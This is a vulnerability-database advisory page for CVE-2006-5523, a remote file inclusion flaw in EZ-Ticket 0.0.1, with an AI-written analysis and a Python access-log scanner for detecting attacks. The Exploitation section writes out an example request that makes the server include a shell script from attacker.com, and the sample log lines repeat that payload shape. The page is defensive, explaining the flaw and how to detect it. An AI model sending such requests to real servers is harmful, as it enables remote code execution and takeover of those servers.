VYPR
Unrated severity · NVD Advisory · Published Oct 26, 2006 · Updated Apr 23, 2026

CVE-2006-5523

Description

EZ-Ticket 0.0.1 contains a PHP remote file inclusion vulnerability in common.php allowing arbitrary code execution via the ezt_root_path parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

EZ-Ticket version 0.0.1 includes a remote file inclusion vulnerability in the common.php file. The script unsafely uses the $ezt_root_path variable in an include() statement on line 3: include($ezt_root_path . '/functions/anti-hack.php');. An attacker can control $ezt_root_path via the ezt_root_path GET parameter, leading to inclusion of arbitrary remote PHP files. The vulnerable code is present in the ezt-0.01.tar.gz distribution [1][2].

Exploitation

An attacker needs only network access to the target web server. No authentication is required. The exploit is performed by sending an HTTP request to common.php with the ezt_root_path parameter set to a URL pointing to a malicious PHP script. For example: http://[Target]/[Path]/common.php?ezt_root_path=http://attacker.com/shell.txt? [2]. The trailing ? is used to strip the appended path segment. The attacker must host a PHP payload on a server reachable from the target.

Impact

Successful exploitation allows remote attackers to execute arbitrary PHP code on the target server. This can lead to full compromise of the web application and potentially the underlying server, including data theft, defacement, or further lateral movement. The code runs with the privileges of the web server process.

Mitigation

No official patch or fixed version has been released for EZ-Ticket 0.0.1. The project appears to be abandoned. As a workaround, administrators should remove or disable the common.php file if not required, or apply input validation to the ezt_root_path parameter. Alternatively, consider migrating to a supported ticket system. The vulnerability is listed in the Exploit-DB archive [2] but not in CISA's Known Exploited Vulnerabilities catalog.
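
A log check for the request shape described under Exploitation, as an added example that is not part of the advisory or of EZ-Ticket: it scans access-log lines for requests to common.php whose ezt_root_path value begins with a URL scheme. The combined log format, the /ezt/ install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A scheme prefix (http:, ftp:, php:, data: ...) means the value is not a local
# install path. Two or more characters, so a Windows drive letter is not flagged.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]+:', re.I)
PARAM = "ezt_root_path"  # parameter named in the advisory


def flag_request(target):
    """Return the suspicious ezt_root_path value in a request target, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/common.php"):
        return None
    # parse_qsl percent-decodes each value once, so an encoded "http%3A%2F%2F"
    # is compared in its decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and SCHEME_RE.match(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, value) for each log line carrying a flagged request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hit = flag_request(match.group(1)) if match else None
        if hit is not None:
            yield number, hit


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /ezt/index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /ezt/common.php?ezt_root_path=http://files.example.invalid/x.txt? HTTP/1.1" 200 0',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /ezt/common.php?ezt_root_path=hTTp%3A%2F%2Ffiles.example.invalid%2Fx HTTP/1.1" 200 0',
    '203.0.113.4 - - [01/Jan/2024:10:02:00 +0000] "GET /ezt/common.php?other=http://example.invalid/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: ezt_root_path={value!r}")
```

Only query-string values are visible in an access log, so a value sent in a request body would need a WAF or application-level check instead.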

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • cpe:2.3:a:ez-ticket:ez-ticket:0.0.1:*:*:*:*:*:*:*
  • (no CPE) range: =0.0.1

Patches

0

No patches discovered yet.

References

4
